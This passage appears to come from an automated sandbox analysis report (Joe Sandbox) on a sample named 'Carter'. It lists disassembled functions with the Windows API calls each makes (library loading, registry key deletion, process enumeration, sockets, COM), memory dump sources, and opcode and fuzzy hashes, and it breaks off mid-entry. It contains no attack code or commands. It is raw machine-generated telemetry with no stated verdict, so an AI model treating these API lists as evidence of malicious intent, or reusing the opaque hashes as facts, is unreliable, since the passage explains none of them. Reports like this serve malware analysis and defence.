                                                                            • Instruction Fuzzy Hash: C2E08C381617538BD7264F6AC85AB82B6DCAB08724FA0842AE885D2250D770C840CB50
                                                                            Function 00284B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00284B44,?,002849D4,?,?,002827AF,?,00000001), ref: 00284B85
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00284B97
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 2574300362-3689287502
                                                                            • Opcode ID: affb8f316d8fa1bc817c795c3778fe0b5610d9383c65007537fcbf4ec0493212
                                                                            • Instruction ID: cde367991023619c519db73213071c821bb2c2b9aeee5396c7049a1b70631d71
                                                                            • Opcode Fuzzy Hash: affb8f316d8fa1bc817c795c3778fe0b5610d9383c65007537fcbf4ec0493212
                                                                            • Instruction Fuzzy Hash: CFD012789167139FD725AF35DC2874676D8AF05355F11882BD4C6E2590E770D490C750
                                                                            Function 00284BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00284AF7,?), ref: 00284BB8
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00284BCA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 2574300362-1355242751
                                                                            • Opcode ID: 635c8aacc1346800caa77894036d9effb599273accc5e42f529f88d30070403f
                                                                            • Instruction ID: c5de28261b0cd4527fbf50f27610531356bcc5d76ec07801334b7bae5127eeec
                                                                            • Opcode Fuzzy Hash: 635c8aacc1346800caa77894036d9effb599273accc5e42f529f88d30070403f
                                                                            • Instruction Fuzzy Hash: 12D0C2388113138FE3256F30DC1874672D8AF04340F008C2BD4C2D2590DB70D490C700
                                                                            Function 002F1447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,002F1696), ref: 002F1455
                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 002F1467
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                            • API String ID: 2574300362-4033151799
                                                                            • Opcode ID: ec6c8f6e3297a62589377902a8062b8be9f3b5a8b94b50a6236280edd4f71b2f
                                                                            • Instruction ID: 44aec5d7097620a0757dfbe09d1c163de93cf75da1d58bdb5309eaf3b7eccbca
                                                                            • Opcode Fuzzy Hash: ec6c8f6e3297a62589377902a8062b8be9f3b5a8b94b50a6236280edd4f71b2f
                                                                            • Instruction Fuzzy Hash: 20D0C730421327CFD7268F30D80834AB2E8AF06381F10C83AD4D2E2160EA70E8E0CA00
                                                                            Function 002855F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00285E3D), ref: 002855FE
                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00285610
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                            • API String ID: 2574300362-192647395
                                                                            • Opcode ID: 9aac493c531bed0920f6ffc0fe9746d4aa60e057de52f3299b2f1b36d871beb8
                                                                            • Instruction ID: 98e2e52d68fc7b661afc4d99e4a27dc5ba1be5207fba976e99eae855e247256d
                                                                            • Opcode Fuzzy Hash: 9aac493c531bed0920f6ffc0fe9746d4aa60e057de52f3299b2f1b36d871beb8
                                                                            • Instruction Fuzzy Hash: 00D01278962723CFD7295F35C81875676D9AF05355F11882AD4C6D21E1E770C480C750
                                                                            Function 002E97CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,002E93DE,?,00300980), ref: 002E97D8
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 002E97EA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                            • API String ID: 2574300362-199464113
                                                                            • Opcode ID: 859a1019bd7887d5edaccd996a55887236f62e650813833fb36d32c23f3f05b7
                                                                            • Instruction ID: fb3d67bab7194e7367c78a236832cc0bc5e1f3d14b53028e912d6f95735dc74e
                                                                            • Opcode Fuzzy Hash: 859a1019bd7887d5edaccd996a55887236f62e650813833fb36d32c23f3f05b7
                                                                            • Instruction Fuzzy Hash: BBD012745617238FD7255F36D898746B6D8AF05391F11882BD8C6E2160DB70D4C0C651
                                                                            Function 002EE713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?), ref: 002EE7A7
                                                                            • CharLowerBuffW.USER32(?,?), ref: 002EE7EA
                                                                              • Part of subcall function 002EDE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 002EDEAE
                                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 002EE9EA
                                                                            • _memmove.LIBCMT ref: 002EE9FD
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                                            • String ID:
                                                                            • API String ID: 3659485706-0
                                                                            • Opcode ID: 533be52f519523cf6c10a258858f7c67bf6f18e690de3b286e75fafc6f25c600
                                                                            • Instruction ID: 93d0ceb3866673ffffab2a83362f1daa7df3ec71bef790170b54b30a3b94d27f
                                                                            • Opcode Fuzzy Hash: 533be52f519523cf6c10a258858f7c67bf6f18e690de3b286e75fafc6f25c600
                                                                            • Instruction Fuzzy Hash: 46C17971A283418FCB14DF29C48096ABBE4FF89714F05896EF8999B351D731E916CF82
                                                                            Function 002E877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 002E87AD
                                                                            • CoUninitialize.OLE32 ref: 002E87B8
                                                                              • Part of subcall function 002FDF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,002E8A0E,?,00000000), ref: 002FDF71
                                                                            • VariantInit.OLEAUT32(?), ref: 002E87C3
                                                                            • VariantClear.OLEAUT32(?), ref: 002E8A94
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                            • String ID:
                                                                            • API String ID: 780911581-0
                                                                            • Opcode ID: 1c9a6dee0d368afd047114105d98614d6a86de11d7b90e1774261d8f39b30f77
                                                                            • Instruction ID: 3771f4fd1c3deaa9078a593151e4eef5013ace236fd30b871e537c6a837add00
                                                                            • Opcode Fuzzy Hash: 1c9a6dee0d368afd047114105d98614d6a86de11d7b90e1774261d8f39b30f77
                                                                            • Instruction Fuzzy Hash: B8A15775664B419FD710EF15C481B2AB7E4BF88314F448859F98A9B3A2CB70ED20CF92
                                                                            Function 002C814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00303C4C,?), ref: 002C8308
                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00303C4C,?), ref: 002C8320
                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,00300988,000000FF,?,00000000,00000800,00000000,?,00303C4C,?), ref: 002C8345
                                                                            • _memcmp.LIBCMT ref: 002C8366
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                            • String ID:
                                                                            • API String ID: 314563124-0
                                                                            • Opcode ID: 27d75b7933ef97e085ebb8501feb51aa5659950e5146a7d0990a9a9fbda185e1
                                                                            • Instruction ID: 6871d54c4beb13241e77dcb845f3afa6293519c52e02f157800173e8cdbb4c60
                                                                            • Opcode Fuzzy Hash: 27d75b7933ef97e085ebb8501feb51aa5659950e5146a7d0990a9a9fbda185e1
                                                                            • Instruction Fuzzy Hash: C8814E75A10109EFCB04DFD4C888EEEB7B9FF89315F108599E506AB250DB71AE06CB60
                                                                            Function 002C749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$AllocClearCopyInitString
                                                                            • String ID:
                                                                            • API String ID: 2808897238-0
                                                                            • Opcode ID: a766374ef1f29304c8e81579d1be711c68ebfaaf6dd8581e9380b63657bcc197
                                                                            • Instruction ID: bab56d559d9ac925d066fe646f8d2ad32956013fbfae3e637e221496a3d203bc
                                                                            • Opcode Fuzzy Hash: a766374ef1f29304c8e81579d1be711c68ebfaaf6dd8581e9380b63657bcc197
                                                                            • Instruction Fuzzy Hash: 5C51B730638B029ADB249F79D895F2DF7E9AF44310F30891FE54AC76A1EB7098608F05
                                                                            Function 002EF4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 002EF526
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 002EF534
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 002EF5F4
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 002EF603
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                            • String ID:
                                                                            • API String ID: 2576544623-0
                                                                            • Opcode ID: 70cb370201b281a246ec1e20c78f6f6562a43ecd692b23f90c9ad9cd4409c10f
                                                                            • Instruction ID: 628a8faa631b28fe9b4afd3921506946170d290f9e78bc42c08fc55c85b7d321
                                                                            • Opcode Fuzzy Hash: 70cb370201b281a246ec1e20c78f6f6562a43ecd692b23f90c9ad9cd4409c10f
                                                                            • Instruction Fuzzy Hash: 6B518DB11143519FD324EF24D881E6BB7E8EF94700F40492DF595972A1EB70A925CF92
                                                                            Function 0029492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                            • String ID:
                                                                            • API String ID: 2782032738-0
                                                                            • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                            • Instruction ID: 5e42f456ee7bd18b6e82158b62326f168d541c4b7ab8c83563674ed7a0c13900
                                                                            • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                            • Instruction Fuzzy Hash: F541E9317207079BEF28EF69C8A0D6F77A5AF45360B24813DE859C7640E770DD628B44
                                                                            Function 002CA638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 002CA68A
                                                                            • __itow.LIBCMT ref: 002CA6BB
                                                                              • Part of subcall function 002CA90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 002CA976
                                                                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 002CA724
                                                                            • __itow.LIBCMT ref: 002CA77B
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$__itow
                                                                            • String ID:
                                                                            • API String ID: 3379773720-0
                                                                            • Opcode ID: b8cfc5f07ded58c50d28ad8c4080edd385a754544ae4a4d468c422fcdf5a35c6
                                                                            • Instruction ID: 01855b5ff54a3e0938cbfa016c896ded6de83069f554706676529227e759679c
                                                                            • Opcode Fuzzy Hash: b8cfc5f07ded58c50d28ad8c4080edd385a754544ae4a4d468c422fcdf5a35c6
                                                                            • Instruction Fuzzy Hash: 8841AD74A1120DABDF11EF54C846FEEBBB9EF48754F040129F905A32C1DB709A65CBA2
                                                                            Function 002E7095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 002E70BC
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 002E70CC
                                                                              • Part of subcall function 00274D37: __itow.LIBCMT ref: 00274D62
                                                                              • Part of subcall function 00274D37: __swprintf.LIBCMT ref: 00274DAC
                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 002E7130
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 002E713C
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$__itow__swprintfsocket
                                                                            • String ID:
                                                                            • API String ID: 2214342067-0
                                                                            • Opcode ID: 2025e70247e96535b4dc8c44af228c882163f530a8be80e0bae0500dc7797455
                                                                            • Instruction ID: 13a0c2f79797d253359e38555351dbba20112498be201c97a1c7cdff4ab58f70
                                                                            • Opcode Fuzzy Hash: 2025e70247e96535b4dc8c44af228c882163f530a8be80e0bae0500dc7797455
                                                                            • Instruction Fuzzy Hash: C1419171660200AFEB25BF24DC86F2A77A89B04B14F44C458FA5D9F3C2DBB49D218F91
                                                                            Function 002E6B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00300980), ref: 002E6B92
                                                                            • _strlen.LIBCMT ref: 002E6BC4
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen
                                                                            • String ID:
                                                                            • API String ID: 4218353326-0
                                                                            • Opcode ID: 53a61d89fc29eb6682a27566f601ca76f81f0d93837c46ae6c9d61e504f05b9b
                                                                            • Instruction ID: 12994421629e017b273594239717836e243924e6b0c1ff76a41e0a40ed355cad
                                                                            • Opcode Fuzzy Hash: 53a61d89fc29eb6682a27566f601ca76f81f0d93837c46ae6c9d61e504f05b9b
                                                                            • Instruction Fuzzy Hash: 4F41D231660105ABCB04FB65DC99FAEB3A9EF68350F54815AF81A97292DB30AD21CF50
                                                                            Function 002F8E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002F8F03
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: InvalidateRect
                                                                            • String ID:
                                                                            • API String ID: 634782764-0
                                                                            • Opcode ID: c53ee203c901e55567b215927b54a639edcf92b59f782134a16ecb66dfff17e0
                                                                            • Instruction ID: e0d5357c8a8459f3a09fd3459583bda2ff6393323807952122a05f0ca211c740
                                                                            • Opcode Fuzzy Hash: c53ee203c901e55567b215927b54a639edcf92b59f782134a16ecb66dfff17e0
                                                                            • Instruction Fuzzy Hash: 2031D33063510EAEEB358E14CC89FB8F7A6EB053A0F944621FB01D65A0CF71D9608A51
                                                                            Function 002FB1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ClientToScreen.USER32(?,?), ref: 002FB1D2
                                                                            • GetWindowRect.USER32(?,?), ref: 002FB248
                                                                            • PtInRect.USER32(?,?,002FC6BC), ref: 002FB258
                                                                            • MessageBeep.USER32(00000000), ref: 002FB2C9
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 1352109105-0
                                                                            • Opcode ID: 469ee9d3e032bde89ce83e28060942dcce0c669270637bb5f843d8f7080542b4
